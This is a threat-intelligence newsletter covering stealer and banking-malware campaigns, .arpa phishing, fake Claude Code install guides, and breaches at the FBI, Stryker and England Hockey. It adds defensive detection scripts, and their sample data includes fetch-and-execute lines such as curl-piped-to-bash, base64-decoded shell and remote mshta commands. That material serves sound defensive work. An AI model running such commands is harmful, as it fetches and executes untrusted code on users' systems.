Threat Newsletter March 16, 2026


This week's threat intel highlights multiple campaigns abusing trusted infrastructure and user habits to steal data and gain access. These include fake GitHub download pages and cloned install docs that trick people into running malicious commands. We cover major disruption events—the FBI system investigation and Stryker's global outage—to show how quickly incidents can impact sensitive data and business operations. We also review evolving phishing techniques, including .arpa-based redirect hosting and impersonation of local government officials targeting permit applicants. Finally, we touch on broader trends: geopolitical cyber spillover, new regional banking malware, ransomware leak-site pressure, and government and regulatory moves to counter fraud and reduce AI-agent risk.


Suspicious Activity Detected on FBI Network System Holding Law Enforcement Sensitive Data

The FBI is investigating suspicious activity on an internal system that holds sensitive information related to surveillance operations and investigations.

Key Takeaways

❗What Happened: The FBI found and addressed suspicious cyber activity on an internal system and opened an investigation.

💡Why it matters: Even though the system is unclassified, it contains highly sensitive investigative and surveillance-related information plus PII.

📋Notable Detail: The activity reportedly leveraged commercial ISP vendor infrastructure, suggesting a potentially well-resourced operator or clever operational security.

FBI investigating ‘suspicious’ cyber activity on system holding sensitive surveillance information | Federal News Network
“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the FBI said.

BoryptGrab: New Windows Stealer Delivered Through Malicious GitHub Download Pages

Trend Micro reports a malware campaign distributing a newly identified Windows stealer called BoryptGrab through deceptive, SEO-optimized GitHub repositories and fake download sites that mimic GitHub Pages.

Key Takeaways

❗Primary Risk: Credential and data theft (browser data, passwords, crypto wallet data, Telegram info, and Discord tokens). In addition, the malware can take screenshots and collect files.

📨 Distribution: Victims are lured to fake GitHub repos and GitHub Pages sites, where they download ZIP files that masquerade as popular “free tools”. Once executed, the infection chain can deploy multiple payloads, including the BoryptGrab stealer and a PyInstaller backdoor called TunnesshClient.

🛡️ Defense:

  • Do not download “free tools” from random GitHub repos or GitHub Pages. Only use official vendor sites or an approved software catalog.
  • Block or warn on downloads from github.io (and other newly seen “download” domains) in your web filter.
  • Prevent running files from ZIPs in Downloads/Temp. If possible, block executables and scripts from user-writable folders.
  • Lock down scripts: disable or restrict PowerShell and Windows Script Host (VBS via wscript.exe / cscript.exe) for non-admin users.
  • Alert/block outbound SSH from workstations. Reverse SSH tunnels should be rare for normal users.
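
Two of the checks above (archive downloads from GitHub Pages hosts, and outbound SSH from workstations) written as detection logic over constructed log records. This is an added example, not code from the original post or from Trend Micro; the workstation CIDR, the jump-host allowlist, and the record field names are assumptions.

```python
# Added example: web-filter and egress checks from the defense list above,
# run over constructed proxy/flow records. CIDR and allowlist are assumed.
import ipaddress
from urllib.parse import urlparse

WORKSTATION_NETS = [ipaddress.ip_network("10.20.0.0/16")]   # assumed user VLAN
SSH_ALLOWLIST = {"10.1.1.10"}                                # assumed jump host

def suspicious_download(url: str) -> bool:
    """Web-filter rule: archive downloads served from a *.github.io host."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    return host.endswith(".github.io") and parsed.path.lower().endswith((".zip", ".7z", ".rar"))

def suspicious_ssh(src_ip: str, dst_ip: str, dst_port: int) -> bool:
    """Outbound TCP/22 from a workstation to anything but an allowlisted host."""
    src = ipaddress.ip_address(src_ip)
    if dst_port != 22 or not any(src in net for net in WORKSTATION_NETS):
        return False
    return dst_ip not in SSH_ALLOWLIST

# Constructed sample events: proxy records carry a url, flow records carry a port.
SAMPLE_EVENTS = [
    {"type": "proxy", "src": "10.20.5.7", "url": "https://free-tools-pro.github.io/dl/FreeToolSetup.zip"},
    {"type": "proxy", "src": "10.20.5.7", "url": "https://docs.github.io/en/pages/index.html"},
    {"type": "flow",  "src": "10.20.5.7", "dst": "203.0.113.44", "dport": 22},
    {"type": "flow",  "src": "10.20.5.7", "dst": "10.1.1.10",    "dport": 22},   # allowlisted jump host
    {"type": "flow",  "src": "10.30.0.9", "dst": "203.0.113.44", "dport": 22},   # server VLAN, out of scope
]

def triage(events):
    """Return (rule, source host) tuples for every event that matched a rule."""
    hits = []
    for ev in events:
        if ev["type"] == "proxy" and suspicious_download(ev["url"]):
            hits.append(("github_pages_archive_download", ev["src"]))
        elif ev["type"] == "flow" and suspicious_ssh(ev["src"], ev["dst"], ev["dport"]):
            hits.append(("workstation_outbound_ssh", ev["src"]))
    return hits

if __name__ == "__main__":
    for rule, src in triage(SAMPLE_EVENTS):
        print(f"{rule}: {src}")
```
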
New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages
The BoryptGrab campaign uses fake SEO‑optimized GitHub repositories and deceptive download pages to distribute a data‑stealing malware family that delivers multiple payloads, including a reverse SSH backdoor, to Windows users.

Threat Actors Turn .arpa into a Phishing Redirect and Hosting Layer

Infoblox reports a phishing campaign abusing the .arpa top-level domain—normally reserved for reverse DNS lookups, not web content.

Key Takeaways

👊 Attack: Threat actors are using .arpa (reverse DNS) names as phishing links and hosting, which can bypass basic domain reputation assumptions.

Harder for users to spot: Links may show reverse DNS-looking strings instead of normal domains, and the real destination is obscured through redirects.

❗Defender Challenge: Because .arpa is “infrastructure-like” and rarely blocked, it can slip past allowlists and filtering rules that focus on typical web TLDs.

🥷Cloudflare used as cover: Resolved domains pointed into Cloudflare’s edge network, hiding the true hosting location and complicating takedown and blocking.

🛡️Defense:

  • Treat .arpa links as suspicious in email. Flag or quarantine messages containing URLs that end in .arpa or include long reverse-DNS-style hostnames.
  • Block web traffic to .arpa domains at the proxy/DNS layer. In normal enterprise use, .arpa should not be serving web pages.
  • Add URL rewrite and detonation for .arpa clicks. If a user clicks, force the link through your secure web gateway sandbox first.
  • Monitor for CNAME hijacking / domain shadowing indicators.
    • Alert on unexpected CNAME changes for your domains.
    • Enforce MFA and strong admin controls for DNS provider accounts.
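
The first bullet above as a mail-filter helper: extract URLs from message text and flag any whose hostname sits under .arpa or has a reverse-DNS shape. This is an added example, not code from the original post or from Infoblox; the length threshold for "long reverse-DNS-style" names and the sample message are assumptions.

```python
# Added example: flag .arpa and reverse-DNS-style hostnames in mail URLs.
# Only the hostname is inspected, so ".arpa" inside a path is not a hit.
import re
from typing import Optional
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Reverse-DNS shapes: dotted octets under in-addr.arpa, nibbles under ip6.arpa.
REVERSE_DNS_RE = re.compile(
    r"^(?:(?:\d{1,3}\.){1,4}in-addr\.arpa|(?:[0-9a-f]\.){1,32}ip6\.arpa)$", re.IGNORECASE
)

def classify_host(host: str) -> Optional[str]:
    """Return a finding label for a hostname, or None when it looks ordinary."""
    host = host.lower().rstrip(".")
    if REVERSE_DNS_RE.match(host):
        return "reverse-dns-host"
    if host == "arpa" or host.endswith(".arpa"):
        return "arpa-tld-host"
    if host.count(".") >= 8 and len(host) > 60:      # assumed threshold for "long" names
        return "long-reverse-dns-style-host"
    return None

def scan_message(text: str):
    """Return (url, label) for every URL in the message that trips a rule."""
    findings = []
    for url in URL_RE.findall(text):
        label = classify_host(urlparse(url).hostname or "")
        if label:
            findings.append((url, label))
    return findings

# Constructed sample message: a legitimate link, a reverse-DNS phishing-style
# link, and a link whose path merely contains the string ".arpa".
SAMPLE_MAIL = """Your invoice is ready. Review it at
https://billing.example.com/invoice/4411
or, if that fails, use our mirror https://44.113.0.203.in-addr.arpa/login?id=4411
See also https://example.com/docs/about.arpa.html for details."""

if __name__ == "__main__":
    for url, label in scan_message(SAMPLE_MAIL):
        print(label, url)
```
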
Abusing .arpa: The TLD That Isn’t Supposed to Host Anything
The .arpa domain is being abused to host phishing content on domains that should not resolve to an IP address, but do.

InstallFix Attack: Cloned Claude Code Docs Trick Users into Running Malware

Threat actors are running an "InstallFix" campaign using cloned installation guides for Claude Code (Anthropic's CLI) to trick users into copying and running malicious install commands.

❗Technique: “InstallFix” is a variation of ClickFix that abuses the habit of running copy/paste install commands.

🚪 Initial Access: Sponsored search ads lead to convincing clones of real install documentation pages.

🪲 Payload: The campaign delivers Amatera Stealer, aimed at stealing credentials and other sensitive data.

🛡️Defense:

  • Do not copy/paste install commands from ads or search results. Go to the vendor’s official site from a bookmark or a known-good link.
  • Skip sponsored results. Train users to avoid “Sponsored” entries when searching for install instructions.
  • Block common installer abuse patterns:
    • macOS/Linux: block or warn on curl | bash and base64-decoded shell one-liners from the internet.
    • Windows: alert/block mshta.exe making outbound connections or spawning unusual child processes.
  • Use application allowlisting for developer tools. Only allow approved installers and package managers.
  • MFA everywhere + session token protection. Infostealers target browser sessions, so protect key accounts and enforce re-auth for risky actions.
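
The "installer abuse patterns" above expressed as process command-line rules and run over constructed process-creation events. This is an added example, not code from the original post or the cited report; the rule names, the sample host names, and the .example domains are assumptions.

```python
# Added example: command-line rules for curl|bash, base64-decoded one-liners
# and mshta.exe fetching remote content, over constructed process events.
import re

RULES = [
    # curl/wget output piped straight into a shell (macOS/Linux)
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)),
    # base64-decoded content executed by a shell
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    # mshta.exe handed an http(s) URL (Windows)
    ("mshta_remote", re.compile(r"mshta(\.exe)?\b.*https?://", re.I)),
]

def match_rules(cmdline: str):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Constructed process-creation events: (host, parent process, command line).
SAMPLE_EVENTS = [
    ("mac-01", "Terminal", "curl -fsSL https://install-docs.example/install.sh | bash"),
    ("mac-01", "Terminal", "curl -fsSL https://install-docs.example/install.sh -o install.sh"),
    ("lnx-02", "bash",     "echo aW5zdGFsbA== | base64 -d | sh"),
    ("win-03", "cmd.exe",  "mshta.exe https://install-docs.example/setup.hta"),
    ("win-03", "explorer", r"mshta.exe C:\Users\jdoe\local.hta"),
]

def triage(events):
    """Return (host, rule, cmdline) for every event that trips at least one rule."""
    hits = []
    for host, _parent, cmd in events:
        for rule in match_rules(cmd):
            hits.append((host, rule, cmd))
    return hits

if __name__ == "__main__":
    for host, rule, cmd in triage(SAMPLE_EVENTS):
        print(f"{host} [{rule}] {cmd}")
```

Saving the script to a file first (the second event) does not match, which is the behaviour you want: the rule targets the copy/paste-and-pipe habit, not curl itself.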
InstallFix: Weaponizing malvertised install guides
Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.

UK Forms Cross-Sector Cyber Fraud Squad to Block Scams and Freeze Criminal Accounts

The UK government is launching a new Online Crime Center in April to coordinate a national response to cyber-enabled fraud.

Key Takeaways

❗New Cyber Group: A dedicated Online Crime Center starts in April to coordinate action against cyber fraud.

💡Who’s involved: Police, intelligence, banks, mobile carriers, and big tech are working together with shared data.

⭐ Objective: Identify and take down scam websites, accounts, phone numbers, and social media scam pages.

💡Why now: Fraud is widespread in the UK and much of it is believed to originate outside the country, requiring international coordination.

UK to launch cyber fraud squad in April | Computer Weekly
The UK’s Online Crime Centre, launching next month, will bring together government, police, intelligence agencies, banks, mobile networks and tech firms to take coordinated action against cyber fraud.

FBI Warns of Phishing Impersonating City and County Officials

The FBI is warning about phishing scams in which criminals impersonate U.S. city and county planning or zoning officials to target people and businesses applying for land-use, planning, or zoning permits.

Key Takeaways

🎯 Who is being targeted: Anyone with an active city/county planning or zoning permit application.

📋How the scam works: Emails impersonate officials and request permit fees, using real permit details to sound legitimate.

Payment methods are a red flag: The scammers push payment via wire, P2P payments, or crypto.

❗Common indicators: Messages from non-government domains, suspicious attachments, and urgency tactics to avoid “permit delays”.

🛡️ Defense: Verify the sender domain and call the city/county directly (using a known phone number) before paying anything. Report to IC3 if targeted or victimized.

FBI warns of impersonation scam targeting land developers
The agency said scammers are impersonating city and county officials and tricking people who have active applications for land use permits.

Regulators Caution Against OpenClaw Deployment Across Banks and Government

Reuters reports that some Chinese government agencies and state-owned enterprises have warned staff not to install OpenClaw, an open-source AI agent, on office devices due to security and data concerns.

Key Takeaways

🚨 What’s happening: Some Chinese state agencies and state-owned firms are warning employees not to deploy OpenClaw (in some cases even on personal devices).

⭐Why: Cyber and data security concerns tied to autonomous agents with device permissions (risk of leaking, deleting, or misusing data).

💡Not a clear “ban”: The report suggests warnings and curbs, but it’s unclear how broad or strict the restrictions are.

💡Policy Tension: China is pushing “AI plus” adoption, but is also trying to reduce risk as AI agents spread across government and industry.

China warns agencies against installing OpenClaw AI over security risks
Chinese regulators warned government agencies and state-owned enterprises against installing OpenClaw AI on office devices, citing risks of data leaks and cyberattacks, according to sources familiar with the matter.

Stryker Suffers Major Outage After Handala-Claimed Attack

Stryker suffered a highly disruptive cyber incident that caused a global network disruption affecting its Microsoft environment. An Iran-linked group called Handala claimed responsibility, alleging a large-scale destructive attack that included wiping devices and stealing data, though some details remain unverified.

Key Takeaways

🌐 High disruption event: The incident caused a global outage/disruption across Stryker’s environment.

🚨 Destructive-attack claims: Handala claimed mass wiping of devices/systems and large data theft, but these claims may be hard to verify.

🕵️Potential wiper tradecraft: The reporting aligns Handala with destructive activity and possible links to an Iranian state-sponsored cluster (often associated with wiper/extortion tactics).

❗Healthcare supply chain risk: A major medtech supplier being disrupted can create downstream operational impact for hospitals and partners.

Stryker cyberattack: Alleged Iran-linked group Handala causes outage
Iran‑linked cyberattack cripples Stryker systems worldwide, leaving thousands of workers offline.

Stryker Network Disruption Update: Order Processing Impacted, Investigation Ongoing

Key Takeaways

What happened: Cyberattack led to a global IT/network disruption in Stryker’s Microsoft environment.

❗Impact: The impact is limited to Stryker’s internal Microsoft environment.

🚨 Customer impact: Disruptions to ordering, manufacturing, and shipping, with backlog handling and recovery efforts underway.

💡Product safety message: Stryker says connected products are not impacted and are safe to use, and several cloud/on-prem products are described as architecturally separate from the affected environment.

🛡️ What customers should do: Route questions through local Stryker sales reps for the latest system status and availability updates.

Customer Updates: Stryker Network Disruption

Iran-Linked Hackers Expand Targeting to the US as War Drives Cyber Risk

The article warns that pro-Iranian and Iran-aligned hackers are increasing activity during the war, primarily in the Middle East but also beginning to spill over into the United States.

Key Takeaways

💡Cyber spillover is increasing: Conflict is driving more cyber activity, and the US is more likely to see related disruptions.

🎯 Targets will include “high impact” sectors: Defense contractors, government vendors, and critical infrastructure like water, power, hospitals, ports, and rail are highlighted as likely targets.

❗Expect disruptive, not always sophisticated attacks: Website defacements, DDoS, hack-and-leak, and destructive actions are cited as realistic outcomes, especially against under-resourced organizations.

Weak links are most at risk: Smaller utilities and healthcare entities can be targeted because they often lag on patching and basic security controls.

Iran-linked hackers take aim at US and other targets, raising risk of cyberattacks during war
Pro-Iranian hackers are targeting sites in the Middle East and starting to stretch into the United States during the war. Hackers supporting Iran claimed responsibility for a significant cyberattack against

VENON: New Rust Banking Trojan Hits Brazil With Overlay Credential Theft

Researchers disclosed a new Rust-based banking malware dubbed VENON targeting Brazilian users. It uses a multi-stage infection chain (including DLL side-loading) and heavy evasion (anti-sandbox, ETW/AMSI bypass) before reaching out for configuration and connecting back to its operator.

Key Takeaways

🪲New banking malware: This is a new Windows banking Trojan written in Rust.

🎯Targets: The malware has been targeting Brazilian users from 33 banks/financial platforms.

🥷 How it Steals: Uses banking overlays triggered by active-window / browser-domain monitoring to harvest credentials when a victim visits a targeted site/app.

🚚 Delivery Chain: Reported to involve social engineering and a ZIP download, then DLL side-loading to run the malicious DLL.

🛡️Defense:

  • Patch and update Windows + browsers so common initial-access exploits and LOLBins are less effective.
  • Block DLL side-loading abuse where possible:
    • Use application control (WDAC/AppLocker/EDR) to allow only trusted signed apps in user-writable paths.
    • Flag legitimate apps loading unexpected DLLs from their own folders (especially after running from a ZIP/extracted directory).
  • Reduce credential value if stolen:
    • Enforce MFA on banking/finance and email accounts.
    • Prefer FIDO2/passkeys where possible.
    • Limit saved passwords and disable “remember me” on high-risk accounts.
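
The "legitimate app loading an unexpected DLL from its own folder" bullet as a heuristic over constructed image-load events. This is an added example, not code from the original post or the cited research; the short list of DLL names that normally resolve from System32, the user-writable roots, and the sample paths are assumptions.

```python
# Added example: score an image-load event for DLL side-loading indicators.
# The DLL name list and user-writable roots are assumptions, not a full catalogue.
from pathlib import PureWindowsPath

# DLLs a legitimate app normally resolves from System32; a copy next to the
# EXE is the classic side-loading setup (assumed short list for the example).
SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll",
               "profapi.dll", "msimg32.dll", "dwmapi.dll", "uxtheme.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\", "\\public\\")

def side_load_reasons(process_path: str, dll_path: str):
    """Return the indicators that make this load look like side-loading (empty = benign)."""
    exe = PureWindowsPath(process_path.lower())
    dll = PureWindowsPath(dll_path.lower())
    reasons = []
    if str(dll.parent).startswith(SYSTEM_DIRS):
        return reasons                       # resolved from the real system directory
    if dll.name in SYSTEM_DLLS:
        reasons.append("system-dll-name-outside-system-dir")
        if dll.parent == exe.parent:
            reasons.append("loaded-from-exe-own-folder")
    if any(seg in str(exe) for seg in USER_WRITABLE):
        reasons.append("exe-runs-from-user-writable-path")   # e.g. an extracted ZIP
    return reasons

# Constructed image-load events: (process image, loaded DLL).
SAMPLE_LOADS = [
    (r"C:\Users\ana\Downloads\Extracted\viewer.exe", r"C:\Users\ana\Downloads\Extracted\version.dll"),
    (r"C:\Program Files\Viewer\viewer.exe",          r"C:\Windows\System32\version.dll"),
    (r"C:\Program Files\Viewer\viewer.exe",          r"C:\Program Files\Viewer\viewerui.dll"),
    (r"C:\Users\ana\Downloads\Extracted\viewer.exe", r"C:\Windows\System32\kernel32.dll"),
]

def triage(loads, min_reasons=2):
    """Flag loads with at least min_reasons indicators; a single one is too noisy alone."""
    hits = []
    for exe, dll in loads:
        reasons = side_load_reasons(exe, dll)
        if len(reasons) >= min_reasons:
            hits.append((exe, dll, reasons))
    return hits

if __name__ == "__main__":
    for exe, dll, reasons in triage(SAMPLE_LOADS):
        print(dll, "<-", exe, reasons)
```
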
Rust-Based VENON Malware Targets 33 Brazilian Banks with Credential-Stealing Overlays
Rust-based VENON malware targets 33 Brazilian financial platforms using advanced evasion and overlays, enabling credential theft.

Ransomware Gang AiLock Threatens England Hockey Data Leak

England Hockey is investigating a potential incident after the AiLock ransomware group listed the organization on its leak site and claimed to have stolen 129GB of data.

Key Takeaways

🕵️Claimed Actor: The AiLock ransomware group listed England Hockey on its data leak site and claims to have stolen 129GB of data.

💡Status: England Hockey is investigating and has not confirmed what data was impacted yet.

❗Response: Working with external experts and relevant authorities.

📈 Practical risk for members: Increased likelihood of phishing or suspicious account activity if data is exposed, so users should be extra cautious with unexpected emails/messages.

England Hockey Investigates Possible Data Breach by AiLock Ransomware Group - Cybersecurity
England Hockey is assessing a potential data breach by the AiLock ransomware gang that listed it on its data leak site.
